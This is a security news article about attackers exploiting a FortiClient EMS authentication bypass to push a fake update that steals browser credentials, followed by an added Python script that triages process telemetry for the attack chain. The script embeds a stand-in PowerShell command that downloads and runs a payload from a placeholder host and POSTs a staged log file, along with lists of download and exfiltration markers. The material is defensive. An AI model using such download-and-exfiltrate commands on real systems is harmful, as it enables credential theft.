
Attackers continue to exploit patched critical security flaws affecting FortiClient Endpoint Management Server (EMS) deployments to distribute credential-stealing malware.
“This campaign exploited trusted endpoint management infrastructure to distribute malware across managed endpoints,” Arctic Wolf said. “Threat actors disguised the credential-stealing payload as a Fortinet endpoint update and silently executed the malicious executable through PowerShell.”
This activity, observed by a cybersecurity firm in May 2026, involved exploitation of CVE-2026-35616 (CVSS score: 9.1), a critical pre-authentication API access bypass leading to privilege escalation. The issue has been resolved by Fortinet in FortiClient EMS 7.4.7 and later.
A successful compromise allows the attacker to modify configurations to defer firmware upgrade notifications, or modify remote access profile configurations and endpoint policies to inject malicious scripts to run on endpoint devices.
“The observed execution patterns suggest that the attacker was using FortiClient’s own management channels to push malicious PowerShell commands to managed endpoints in a manner that resembles legitimate management operations,” said Arctic Wolf.
“Once the attacker gained a route to modify the EMS management configuration, all managed endpoints became potential execution targets without requiring a separate compromise path to each device.”

Additionally, the attack was found to abuse a legitimate executable shipped with FortiClient, ‘fortitray.exe’, and to use ‘cmd.exe’ to launch a .cmd script file. The .cmd script invokes a Base64-encoded PowerShell script, which downloads a malicious payload, executes it, and exfiltrates the result to 83.138.53[.]110 via an HTTP POST request.
The executable named “FortiEndpoint_Patch.exe” disguises itself as an update, but is actually a previously unreported Windows information stealer that can collect sensitive data from Chromium and Gecko-based browsers, including passwords, cookies, credit card information, and autofill details such as addresses and phone numbers.
The stolen data is written to a log file in the ProgramData directory. Notably, the stealer itself has no network exfiltration capability; it is the PowerShell script that sends the captured data to attacker-controlled infrastructure.
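The execution chain described above (fortitray.exe launching cmd.exe with a .cmd script, which in turn runs Base64-encoded PowerShell that downloads a payload, stages data under ProgramData and POSTs it out) gives a defender several process-level signals to look for. The following script is an added example, not code from the article or from Arctic Wolf, showing one way to triage process-creation telemetry for that chain. The event field names (ParentImage, Image, CommandLine), the sample events and the encoded command inside them are all constructed for this example; the decoded script uses a reserved `.invalid` hostname and is only a stand-in with the same shape as the behaviour the article describes.

```python
import base64
import re
from typing import Dict, List, Optional


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand expects the script as Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for the kind of encoded command the article describes:
# download a fake "patch", run it, then POST a staged log file. Hostname is the
# reserved .invalid TLD, so this string does nothing if pasted into a shell.
STAGED_SCRIPT = (
    "Invoke-WebRequest -Uri http://c2.example.invalid/FortiEndpoint_Patch.exe "
    "-OutFile $env:ProgramData\\FortiEndpoint_Patch.exe; "
    "& $env:ProgramData\\FortiEndpoint_Patch.exe; "
    "Invoke-WebRequest -Method POST -Uri http://c2.example.invalid/ "
    "-InFile $env:ProgramData\\log.txt"
)

# Constructed process-creation events in a Sysmon Event ID 1 style (assumed
# field layout). The third event is benign encoded PowerShell for contrast.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c C:\ProgramData\update.cmd"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand "
                    + encode_ps(STAGED_SCRIPT)},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand " + encode_ps("Get-Date")},
]

# Case-insensitive markers checked against the *decoded* script.
DOWNLOAD_MARKERS = ("invoke-webrequest", "invoke-restmethod", "downloadfile",
                    "downloadstring", "start-bitstransfer")
EXFIL_MARKERS = ("-method post", "uploadfile", "uploadstring")

# PowerShell accepts abbreviated switch names; cover the common spellings.
ENCODED_SWITCH = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the list of indicator names matched by one process event."""
    findings: List[str] = []
    parent = ev.get("ParentImage", "").lower()
    image = ev.get("Image", "").lower()
    cmdline = ev.get("CommandLine", "")

    # Signal 1: the FortiClient tray process spawning cmd.exe to run a .cmd file.
    if parent.endswith("fortitray.exe") and image.endswith("cmd.exe") \
            and ".cmd" in cmdline.lower():
        findings.append("fortitray_launches_cmd_script")

    # Signal 2: encoded PowerShell whose decoded body downloads, stages or POSTs.
    if image.endswith("powershell.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append("encoded_powershell")
            low = decoded.lower()
            if any(marker in low for marker in DOWNLOAD_MARKERS):
                findings.append("decoded_script_downloads_content")
            if any(marker in low for marker in EXFIL_MARKERS):
                findings.append("decoded_script_posts_data")
            if "programdata" in low:
                findings.append("decoded_script_touches_programdata")
            if "fortiendpoint_patch.exe" in low:
                findings.append("references_fortiendpoint_patch_exe")
    return findings


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Keep events with at least one indicator beyond bare encoded PowerShell,
    which on its own is too common in legitimate admin tooling to alert on."""
    flagged = []
    for ev in events:
        findings = analyze_event(ev)
        if findings and findings != ["encoded_powershell"]:
            flagged.append({"event": ev, "findings": findings})
    return flagged


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["event"]["Image"], "->", ", ".join(hit["findings"]))
```

The decode step matters more than the string matching: the article's chain hides its download and POST behaviour inside the Base64 argument, so a rule that only inspects the raw command line sees nothing but a long opaque token. Decoding first, then requiring a second indicator (parent process, staging path, or POST) keeps ordinary encoded admin scripts from flooding the queue.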
“Bypassing API authentication and interacting with EMS functionality in a privileged context, attackers were able to modify management configurations and execute malicious scripts on managed endpoints,” said Arctic Wolf.
“Session cookies and stored browser credentials can provide an attacker with subsequent access to cloud services, internal applications, and other authenticated resources, including when session reuse bypasses MFA prompts.”
